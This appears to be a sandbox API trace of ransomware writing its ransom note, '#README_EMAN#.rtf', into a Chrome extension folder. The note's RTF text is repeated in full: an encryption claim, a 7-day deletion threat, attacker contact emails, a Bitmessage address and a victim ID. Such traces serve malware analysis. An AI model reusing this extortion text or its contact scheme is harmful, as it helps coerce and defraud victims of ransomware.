;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0272.361] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.362] CloseHandle (hObject=0x294) returned 1 [0272.362] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\#readme_eman#.rtf")) returned 0xffffffff [0272.362] GetLastError () returned 0x2 [0272.362] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0272.362] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.362] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW 